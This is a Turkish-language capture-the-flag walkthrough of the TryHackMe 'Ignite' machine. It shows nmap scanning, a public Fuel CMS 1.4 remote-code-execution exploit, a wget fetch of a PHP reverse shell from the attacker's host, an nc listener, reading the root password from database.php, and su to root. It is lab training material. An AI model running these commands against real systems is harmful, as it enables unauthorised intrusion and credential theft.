TryHackMe – Ignite Makine Çözümü

Alper Karaca07 mins

Table of Contents

Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “Ignite” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…

Çözüm

1 — Nmap aracını kullanarak makine üzerindeki açık portlar ve servisler hakkında detaylı bilgi ediniyorum.

[root:/home/alper/Desktop/TRYHACKME]# nmap -sS -sV 10.10.194.181
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-07 21:55 +03
Nmap scan report for 10.10.194.181
Host is up (0.067s latency).
Not shown: 999 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))

2 — HTTP sayfasına gittiğim zaman “Fuel CMS 1.4” kullanıldığını görüyorum ve searchsploitte uygun exploit arıyorum.

[root:/home/alper/Desktop/TRYHACKME]# searchsploit "fuel cms"
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
fuel CMS 1.4.1 - Remote Code Execution (1)                                          | linux/webapps/47138.py
Fuel CMS 1.4.1 - Remote Code Execution (2)                                          | php/webapps/49487.rb
Fuel CMS 1.4.1 - Remote Code Execution (3)                                          | php/webapps/50477.py
Fuel CMS 1.4.13 - 'col' Blind SQL Injection (Authenticated)                         | php/webapps/50523.txt
Fuel CMS 1.4.7 - 'col' SQL Injection (Authenticated)                                | php/webapps/48741.txt
Fuel CMS 1.4.8 - 'fuel_replace_id' SQL Injection (Authenticated)                    | php/webapps/48778.txt
Fuel CMS 1.5.0 - Cross-Site Request Forgery (CSRF)                                  | php/webapps/50884.txt
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results
Papers: No Results
[root:/home/alper/Desktop/TRYHACKME]# searchsploit -m 50477

3 — Exploit ile kendi bilgisayarımdan php reverse shell indirip çalıştırıyorum.

[root:/home/alper/Desktop/TRYHACKME]# python3 50477.py -u http://10.10.194.181
[+]Connecting...
Enter Command $ls
systemREADME.md
assets
composer.json
contributing.md
fuel
index.php
robots.txt


Enter Command $wget http://10.8.94.51:8000/shell.php
*
*
*
*
Enter Command $php shell.php
[root:/home/alper/Desktop/TRYHACKME]# nc -lvnp 4444
Listening on 0.0.0.0 4444
Connection received on 10.10.194.181 49054
Linux ubuntu 4.15.0-45-generic #48~16.04.1-Ubuntu SMP Tue Jan 29 18:03:48 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
 11:58:47 up 6 min,  0 users,  load average: 0.41, 0.82, 0.50
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
www-data
$

4 — Php reverse shell bağlantısından sonra www-data kullanıcısının dizinin içinde ilk bayrağı buluyorum.

$ SHELL=/bin/bash script -q /dev/null
www-data@ubuntu:/$ cd /home 
cd /home
www-data@ubuntu:/home$ ls
ls
www-data
www-data@ubuntu:/home$ cd www-data
cd www-data
www-data@ubuntu:/home/www-data$ ls
ls
flag.txt
www-data@ubuntu:/home/www-data$ cat flag.txt
cat flag.txt
*CENSORED*

5 — “Fuel CMS” dizinin içindeki database.php içerisinde root kullanıcısının parolasını buluyorum.

root@ubuntu:/# cd /var/www/html
cd /var/www/html
root@ubuntu:/var/www/html# ls
ls
assets           index.php   shell.php.1   shell.php.2  shell.php.6
composer.json    README.md   shell.php.10  shell.php.3  shell.php.7
contributing.md  robots.txt  shell.php.11  shell.php.4  shell.php.8
fuel             shell.php   shell.php.12  shell.php.5  shell.php.9
root@ubuntu:/var/www/html# cd fuel
cd fuel
root@ubuntu:/var/www/html/fuel# ls
ls
application  data_backup  install   modules
codeigniter  index.php    licenses  scripts
root@ubuntu:/var/www/html/fuel# cd application
cd application
root@ubuntu:/var/www/html/fuel/application# ls
ls
cache   controllers  helpers  index.html  libraries  migrations  third_party
config  core         hooks    language    logs       models      views
root@ubuntu:/var/www/html/fuel/application# cd config
cd config
root@ubuntu:/var/www/html/fuel/application/config# ls
ls
asset.php          editors.php        migration.php        profiler.php
autoload.php       environments.php   mimes.php            redirects.php
config.php         foreign_chars.php  model.php            routes.php
constants.php      google.php         MY_config.php        smileys.php
custom_fields.php  hooks.php          MY_fuel_layouts.php  social.php
database.php       index.html         MY_fuel_modules.php  states.php
doctypes.php       memcached.php      MY_fuel.php          user_agents.php
root@ubuntu:/var/www/html/fuel/application/config# cat database.php

6 — Root kullanıcısına geçip ikinci bayrağı da elde ediyorum.

www-data@ubuntu:/var/www/html/fuel/application/config$ su
su
Password: *CENSORED*

root@ubuntu:/var/www/html/fuel/application/config# whoami
whoami
root
root@ubuntu:/var/www/html/fuel/application/config# cd /root
cd /root
root@ubuntu:~# ls
ls
root.txt
root@ubuntu:~# cat root.txt
cat root.txt
*CENSORED*

Related News